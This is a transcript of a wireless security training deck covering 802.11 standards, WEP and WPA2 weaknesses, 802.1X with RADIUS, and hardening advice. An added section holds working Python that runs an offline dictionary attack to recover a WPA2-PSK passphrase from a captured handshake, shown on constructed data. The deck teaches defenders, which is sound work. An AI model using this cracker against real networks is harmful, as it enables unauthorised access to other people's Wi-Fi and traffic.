Hacking Wireless Networks - (ISC)² U.S. Military …
TRANSCRIPT

  • Hacking Wireless Networks

    What You Need To Know To Protect Yours

    Michael Votaw

    RCC-E Network Monitoring Team Lead

    [email protected]

    CISSP, CCNA, ECIE-NAC

  • Overview

    Ethical Concerns

    CISSP Domains Covered

    Wireless Primer: Back to the basics

    Encryption Methods

    The Tool Chest

    Basic Methods for Securing

  • Code of Ethics Canons

    Protect society, the common good, necessary public

    trust and confidence, and the infrastructure.

    Act honorably, honestly, justly, responsibly, and legally.

    Provide diligent and competent service to principals.

    Advance and protect the profession.

  • CISSP Domains Addressed

    Security and Risk Management

    - Confidentiality, integrity, and availability concepts

    - Legal and regulatory issues

    - Professional ethics

    - Security policies, standards, procedures and guidelines

    Asset Security

    - Ownership (e.g. data owners, system owners)

    - Protect privacy

    - Data security controls

  • CISSP Domains Addressed (Continued)

    Security Engineering

    - Engineering processes using secure design principles

    - Security architectures, designs, and solution elements vulnerabilities

    - Mobile systems vulnerabilities

    - Cryptography

    - Site and facility design secure principles

    - Physical security

    Communication and Network Security

    - Secure network architecture design (e.g. IP & non-IP

    protocols, segmentation)

    - Secure network components

    - Secure communication channels

    - Network attacks

  • CISSP Domains Addressed (Continued)

    Identity and Access Management

    - Identification and authentication of people and devices

    - Identity as a service (e.g. cloud identity)

    - Third-party identity services (e.g. on-premise)

    - Access control attacks

    Security Assessment and Testing

    - Assessment and test strategies

    - Security process data (e.g. management and operational controls)

    - Security control testing

    - Security architectures vulnerabilities


  • IEEE 802.11 Standards

    802.11

    Introduced in June, 1997

    Operates in the 2.4 GHz band

    Operational bandwidth 22MHz

    Data rates 1, 2 Mbps

    Range 20m Indoor, 100m Outdoor


  • IEEE 802.11b

    Introduced in September, 1999

    Operates in the 2.4 GHz band

    Operational bandwidth 22MHz

    14 channels defined, but each is 22 MHz wide on a 5 MHz grid, so 5 channels of separation are needed to avoid overlap, leaving only 3 useful channels (1, 6 and 11)

    Data rates 1, 2, 5.5, 11 Mbps

    Range 35m Indoor, 140m Outdoor


  • IEEE 802.11a

    Introduced in September, 1999

    More expensive, so not typically used by consumers

    Operates in the 5 GHz band

    Operational bandwidth 20MHz

    Far more non-overlapping channels (22 in North America)

    Data rates 6, 9, 12, 18, 24, 36, 48, 54 Mbps

    Range 35m Indoor, 120m Outdoor


  • IEEE 802.11g

    Introduced in June, 2003

    Operates in the 2.4 GHz band

    Operational bandwidth 20MHz

    Data rates 6, 9, 12, 18, 24, 36, 48, 54 Mbps

    Range 38m Indoor, 140m Outdoor

    Backward compatible with 802.11b


  • IEEE 802.11n

    Introduced in October, 2009

    No new channels or frequencies introduced (uses 2.4GHz & 5 GHz)

    Operational bandwidth 20MHz/40MHz

    Up to 4 spatial streams (MIMO, Multiple Input, Multiple Output)

    Per-stream data rates (20 MHz, short guard interval) 7.2, 14.4, 21.7, 28.9, 43.3, 57.8, 65, 72.2 Mbps

    Per-stream data rates (40 MHz, short guard interval) 15, 30, 45, 60, 90, 120, 135, 150 Mbps

    Up to 600 Mbps aggregate with 4 streams at 40 MHz

    Range 70m Indoor, 250m Outdoor

  • IEEE 802.11ac

    Introduced in December, 2013

    Uses only the 5 GHz band

    Operational bandwidth 20/40/80/160 MHz

    Up to 8 spatial streams (MIMO, Multiple Input, Multiple Output)

    Per-stream data rates 96.3 Mbps (20 MHz), 200 Mbps (40 MHz)

    Per-stream data rates 433.3 Mbps (80 MHz), 866.7 Mbps (160 MHz)

    Range 35m Indoor, 115m Outdoor

    Aggregate rates near 7 Gbps are possible (8 streams at 160 MHz)

  • Channel Discussion 802.11b 2.4 GHz

    Because of the bandwidth constraints, only three useful (non-overlapping) channels are available: 1, 6 and 11

    Channels are spaced 5 MHz apart but are 20 to 22 MHz wide, so five channels of separation are required to avoid overlap

    Japan is the only country where channel 14 is allowed

  • Channel Discussion 802.11b/g/n 2.4 GHz

    The 2.4 GHz band is by far the busiest

    Inexpensive equipment makes it easy to deploy and use

    Creates problems for 802.11n, whose 40 MHz channels consume two of the three non-overlapping channels

  • Channel Discussion 802.11a/n/ac 5GHz


  • Encryption methods - WEP

    WEP (Wired Equivalent Privacy)

    - Introduced with 802.11 in 1997

    - Uses the RC4 stream cipher with a 24-bit IV prepended to a static 40- or 104-bit key; the IV space is tiny and RC4's key scheduling leaks key bytes

    - Uses CRC-32 for data integrity; CRC is linear, not a MAC, so encrypted frames can be modified undetected

    - Successfully exploited in 2001 (the Fluhrer, Mantin and Shamir attack)

    - Can be cracked in minutes with aircrack-ng

  • Encryption Methods WPA/WPA2 (802.11i)

    WPA

    - Introduced in 2003 by the Wi-Fi Alliance as an interim measure (a subset of draft 802.11i) until WPA2 was released

    - Employs TKIP: still RC4 underneath, but with per-packet key mixing (a unique 128-bit key for each packet), a 48-bit sequence counter against replay, and the Michael MIC

    WPA2

    - Released in 2004; implements the ratified 802.11i standard

    - Far superior to WEP

    - Uses CCMP (Counter Mode with CBC-MAC Protocol): AES with a 128-bit key operating on 128-bit blocks, providing both confidentiality and integrity

    - 802.11n and 802.11ac only deliver their high-throughput rates with CCMP; TKIP or WEP forces the link down to legacy rates

    - Still breakable with brute-force and dictionary attacks, but only against a pre-shared key: the attacker captures the 4-way handshake and guesses passphrases offline

  • Encryption Methods WPA2 (802.11i)

    WPA2 offers two authentication modes (the encryption, CCMP, is the same in both)

    WPA2-PSK (also called WPA2-Personal)

    - WPA2 Pre-Shared Key: one passphrase, from which the master key is derived together with the SSID

    - Statically set on the access point and on every wireless device

    - Opens up the possibility of dictionary and brute-force attacks against a captured handshake, and anyone holding the PSK can decrypt other clients' traffic

    WPA2-Enterprise (802.1X authentication)

    - Requires the configuration of a RADIUS server for authentication

    - Keys are derived per session, unique for each client, and changed often

    - The identity of every client is known, and MAC spoofing no longer grants access

  • 802.1X Basic Components

    User: a valid account (AD/RADIUS), a printer, a phone, or a certificate-based identity

    Supplicant: Microsoft XP, Vista, 7, 8, 10; Mac OS X; Linux (Open1X); printers; phones

    Network Device (authenticator): Cisco, Brocade, Extreme, HP, many others

    Authentication Server (RADIUS): Windows AD, FreeRADIUS, OpenRADIUS, Steel-Belted RADIUS, many others

  • 802.1X Basic Flow

    Supplicant to Network Device: username/password (or certificate), carried in EAP over EAPOL

    Network Device to Authentication Server: RADIUS Access-Request with attributes

    - User-Name

    - NAS-IP-Address

    - NAS-Port

    - NAS-Port-Type

    Authentication Server to Network Device: RADIUS Access-Accept with attributes

    - Filter-Id (ACL to apply to the port)

    - Tunnel-Private-Group-ID (VLAN assignment)

  • 802.1X Message Exchange

    All messages on the client side are EtherType 0x888E (EAPOL, the 802.1X Port Access Entity protocol)

    All messages between the switch and the server are RADIUS packets; the EAP conversation rides inside them as EAP-Message attributes

    Most switch vendors enhance this with multi-method and multi-user authentication
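    The Access-Request / Access-Accept pair from the flow above, written out as an added example (it is not the presenter's material and not any vendor's code). It is a self-contained Python model of the RADIUS leg only, covering just the first and last packets of an 802.1X session: the authenticator wraps the supplicant's EAP Response/Identity in an Access-Request carrying User-Name, NAS-IP-Address, NAS-Port and NAS-Port-Type; the server checks the RFC 3579 Message-Authenticator, then answers with Filter-Id, a tagged Tunnel-Private-Group-ID (VLAN) and an EAP Success; the authenticator verifies the Response Authenticator and the Message-Authenticator before acting on either attribute. The shared secret, usernames, addresses, ACL name and VLAN numbers are constructed, and the EAP method rounds (the PEAP or EAP-TLS Access-Challenges) that sit between these two packets are omitted.

```python
import hashlib
import hmac
import os
import struct

# RADIUS codes, attribute types and values (RFC 2865, RFC 2868, RFC 3579)
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, NAS_IP_ADDRESS, NAS_PORT, FILTER_ID = 1, 4, 5, 11
NAS_PORT_TYPE, TUNNEL_TYPE, TUNNEL_MEDIUM_TYPE = 61, 64, 65
EAP_MESSAGE, MESSAGE_AUTHENTICATOR, TUNNEL_PRIVATE_GROUP_ID = 79, 80, 81
NAS_PORT_TYPE_WIRELESS_80211 = 19                 # "Wireless - IEEE 802.11"
EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE, EAP_TYPE_IDENTITY = 2, 3, 4, 1


def encode_attrs(attrs):          # TLV: Type (1), Length (1, counts itself and Type), Value
    return b"".join(bytes([t, len(v) + 2]) + v for t, v in attrs)

def decode_attrs(data):
    attrs, i = [], 0
    while i < len(data):
        attrs.append((data[i], data[i + 2:i + data[i + 1]]))
        i += data[i + 1]
    return attrs

def build_packet(code, ident, authenticator, attrs):
    """Code (1), Identifier (1), Length (2), Authenticator (16), attributes."""
    body = encode_attrs(attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body

def with_message_authenticator(code, ident, request_auth, attrs, secret):
    """Append Message-Authenticator = HMAC-MD5(secret, packet with that attribute zeroed).
    Per RFC 3579 3.2 replies are MACed with the Request Authenticator in the header slot."""
    attrs = attrs + [(MESSAGE_AUTHENTICATOR, bytes(16))]
    mac = hmac.new(secret, build_packet(code, ident, request_auth, attrs), hashlib.md5).digest()
    return build_packet(code, ident, request_auth, attrs[:-1] + [(MESSAGE_AUTHENTICATOR, mac)])

def message_authenticator_ok(packet, request_auth, secret):
    code, ident, _ = struct.unpack("!BBH", packet[:4])
    received, zeroed = None, []
    for t, v in decode_attrs(packet[20:]):
        if t == MESSAGE_AUTHENTICATOR:
            received, v = v, bytes(16)
        zeroed.append((t, v))
    if received is None:                      # mandatory whenever EAP-Message is carried
        return False
    expected = hmac.new(secret, build_packet(code, ident, request_auth, zeroed), hashlib.md5).digest()
    return hmac.compare_digest(received, expected)

def response_authenticator(code, ident, request_auth, attrs, secret):
    """RFC 2865 3: MD5(Code | ID | Length | RequestAuth | Attributes | Secret)."""
    body = encode_attrs(attrs)
    return hashlib.md5(struct.pack("!BBH", code, ident, 20 + len(body)) + request_auth + body + secret).digest()


# ---- network device (authenticator) side ----
def nas_access_request(secret, username, nas_ip, nas_port):
    # Wrap the supplicant's EAP Response/Identity (received over EAPOL) in an Access-Request.
    request_auth = os.urandom(16)
    eap = struct.pack("!BBH", EAP_RESPONSE, 1, 5 + len(username)) + bytes([EAP_TYPE_IDENTITY]) + username.encode()
    attrs = [(USER_NAME, username.encode()),
             (NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))),
             (NAS_PORT, struct.pack("!I", nas_port)),
             (NAS_PORT_TYPE, struct.pack("!I", NAS_PORT_TYPE_WIRELESS_80211)),
             (EAP_MESSAGE, eap)]
    return with_message_authenticator(ACCESS_REQUEST, 1, request_auth, attrs, secret), request_auth

def nas_handle_reply(reply, request_auth, secret):
    """Verify both integrity fields before acting on the ACL and VLAN the server hands back."""
    code, ident, _ = struct.unpack("!BBH", reply[:4])
    attrs = decode_attrs(reply[20:])
    if not hmac.compare_digest(reply[4:20], response_authenticator(code, ident, request_auth, attrs, secret)):
        return None                           # forged or replayed reply, or wrong shared secret
    if not message_authenticator_ok(reply, request_auth, secret):
        return None
    if code != ACCESS_ACCEPT:
        return "reject"
    d = dict(attrs)
    group = d[TUNNEL_PRIVATE_GROUP_ID]
    if group and group[0] <= 0x1F:            # RFC 2868: a leading byte <= 0x1F is the tag
        group = group[1:]
    return {"filter_id": d[FILTER_ID].decode(), "vlan": group.decode()}


# ---- authentication server (RADIUS) side ----
def server_handle(packet, secret, user_vlans):
    """Silently drop bad requests (RFC 3579); otherwise reply with Filter-Id, a tagged
    Tunnel-Type / Tunnel-Medium-Type / Tunnel-Private-Group-ID triple and an EAP Success."""
    code, ident, length = struct.unpack("!BBH", packet[:4])
    request_auth = packet[4:20]
    if code != ACCESS_REQUEST or length != len(packet) or not message_authenticator_ok(packet, request_auth, secret):
        return None
    attrs = dict(decode_attrs(packet[20:]))
    user = attrs.get(USER_NAME, b"").decode()
    eap_id = attrs[EAP_MESSAGE][1]            # EAP identifier the reply must echo
    if user in user_vlans:
        reply_code, reply_attrs = ACCESS_ACCEPT, [
            (FILTER_ID, b"employee-acl"),                                  # constructed ACL name
            (TUNNEL_TYPE, b"\x01\x00\x00\x0d"),                            # tag 1, VLAN (13)
            (TUNNEL_MEDIUM_TYPE, b"\x01\x00\x00\x06"),                     # tag 1, IEEE-802 (6)
            (TUNNEL_PRIVATE_GROUP_ID, b"\x01" + str(user_vlans[user]).encode()),
            (EAP_MESSAGE, struct.pack("!BBH", EAP_SUCCESS, eap_id, 4))]
    else:
        reply_code, reply_attrs = ACCESS_REJECT, [(EAP_MESSAGE, struct.pack("!BBH", EAP_FAILURE, eap_id, 4))]
    reply = with_message_authenticator(reply_code, ident, request_auth, reply_attrs, secret)
    resp_auth = response_authenticator(reply_code, ident, request_auth, decode_attrs(reply[20:]), secret)
    return reply[:4] + resp_auth + reply[20:]
```

    The two checks the network device makes on the reply are the point of the model: a reply with a bad Response Authenticator or a missing Message-Authenticator must be discarded, otherwise anyone who can send UDP toward the switch could hand it an Access-Accept with a VLAN and ACL of their choosing. Both values are keyed only on the shared secret (MD5-based, at that), which is why the switch-to-RADIUS leg still needs a strong secret and an isolated management network even though the client side is protected by EAP.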

  • 802.1X Continued

    Support for periodic re-authentication and manual re-authentication

    EAP Types - Industry Standard

    - EAP-MD5: basic challenge/response; no mutual authentication and no keying material, so unsuitable for wireless

    - PEAP (Protected EAP, from Microsoft and Cisco): a TLS tunnel protects an inner method such as MS-CHAPv2; now dominant in the industry

    - EAP-TLS (EAP Transport Layer Security): requires a digital certificate on each supplicant (see RFC 2716, since replaced by RFC 5216)

    EAP Types - Proprietary

    - EAP-TTLS (Tunneled TLS): originally from Funk Software (later Juniper); does not require a client certificate (began as an Internet Draft, now RFC 5281)

    - LEAP (Cisco Lightweight EAP, proprietary): MS-CHAP inside, vulnerable to offline dictionary attacks; Cisco is moving customers to PEAP

    802.1X on wireless

    - Encryption, rotating keys, integration of users with enterprise authentication

    The future: 802.1AE (MACsec)

    - Key exchange and encryption between clients, switches, and routers

  • The Tools

    ANY PC or mobile device

    - Nearly any wireless device becomes a hacking tool with endless possibilities

    - Using just a Pringles can (cantenna), wireless sniffing can be extended to nearly a mile away. It's highly directional and easy to build.

    - In 2008 Robert Graham and David Maynor of Errata Security demonstrated how a jailbroken iPhone could be powered for days and used to hack internal networks from a FedEx package delivered to a fictitious employee

    BackTrack, or its successor, Kali Linux

    - Freely available as a bootable ISO image and loaded with hacking tools

  • Tools Included in MAC OSX

    (three screenshot slides; no text recoverable)

  • Brute Force / Dictionary Attack with Kali

    (five screenshot slides of the aircrack-ng workflow; no text recoverable)
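    What the Kali screenshots above show aircrack-ng doing, and the "still breakable" caveat on the WPA2 slide, written out as an added example (not the presenter's slides and not aircrack-ng's code). The Python below derives the WPA2-PSK key hierarchy the way 802.11i specifies it (PBKDF2-HMAC-SHA1 to the PMK, PRF-512 to the PTK, HMAC-SHA1 over the EAPOL-Key frame for the MIC) and then runs a dictionary attack against a captured message 2 of the 4-way handshake. The SSID, MAC addresses, nonces, wordlist and the "captured" frame are all constructed inline (the frame is generated from a known passphrase so the attack has something to recover); the frame layout is a minimal EAPOL-Key message 2 with key descriptor version 2 (WPA2/CCMP) and no key data, which is an assumption of this example rather than something the slides show.

```python
import hashlib
import hmac
from typing import Optional

# ---- WPA2-PSK key hierarchy, as specified in IEEE 802.11i ----

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    These 4096 iterations are the only cost an offline guess has to pay."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, first 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]

def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK and the four public values visible in the 4-way handshake."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16]; KCK = PTK[0:16]."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]

MIC_OFFSET = 81   # EAPOL header (4) + descriptor type, key info, key length, replay counter,
                  # nonce, IV, RSC, reserved (1+2+2+8+32+16+8+8 = 77) => MIC at bytes 81..96

def build_eapol_key_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 (802.1X version 2, packet type 3, RSN descriptor, no key data)."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + b"\x00\x00"                # key length
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # SNonce, IV, RSC, reserved
            + mic + b"\x00\x00")         # MIC, key data length = 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body

def crack_psk(ssid: str, ap_mac: bytes, client_mac: bytes, anonce: bytes,
              captured_msg2: bytes, wordlist) -> Optional[str]:
    """Offline dictionary attack against one captured handshake, the way aircrack-ng does it."""
    snonce = captured_msg2[17:49]                           # the client nonce is in message 2 itself
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = captured_msg2[:MIC_OFFSET] + bytes(16) + captured_msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None

# ---- constructed "capture" (what airodump-ng would write to a .cap file) ----
SSID = "CorpGuest"                                # constructed network name
AP_MAC = bytes.fromhex("00111122aabb")            # constructed BSSID
CLIENT_MAC = bytes.fromhex("0022335566cc")        # constructed station address
ANONCE = bytes(range(32))                         # from message 1 (constructed)
SNONCE = bytes(range(32, 64))                     # from message 2 (constructed)
_kck = derive_ptk(derive_pmk("summer2016", SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
CAPTURED_MSG2 = build_eapol_key_msg2(SNONCE, eapol_mic(_kck, build_eapol_key_msg2(SNONCE)))

if __name__ == "__main__":
    wordlist = ["password", "letmein", "summer2015", "summer2016", "CorpGuest1"]
    print(crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, CAPTURED_MSG2, wordlist))   # summer2016
```

    Every candidate costs 4096 HMAC-SHA1 rounds, and that is the only thing standing between the captured handshake and the passphrase: a CPU core manages a few thousand guesses a second and a GPU rig many times that, so an eight-character dictionary word falls in seconds while a long passphrase from a large character set does not. Nothing about the access point is involved after the capture, so lockouts and rate limiting cannot help; only passphrase length, or 802.1X, which removes the shared passphrase altogether, does.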

  • Methods For Securing Wireless

    Use long passphrases for WPA2-Personal keys (up to 63 characters)

    Complexity helps less than you might think; length matters more, because the attack is an offline guess against a captured handshake

    Hide SSIDs when possible, but this only slows down casual attackers (the name is still sent in probe and association frames)

    Enable MAC filtering only WITH WPA2 pre-shared keys; on its own it is defeated by trivial MAC spoofing

    Avoid the use of WPS (the PIN method is very easily cracked)

    Utilize VPN encryption over wireless for sensitive data

    Utilize 802.1X on wireless: the safest way, but also very expensive

  • Questions?
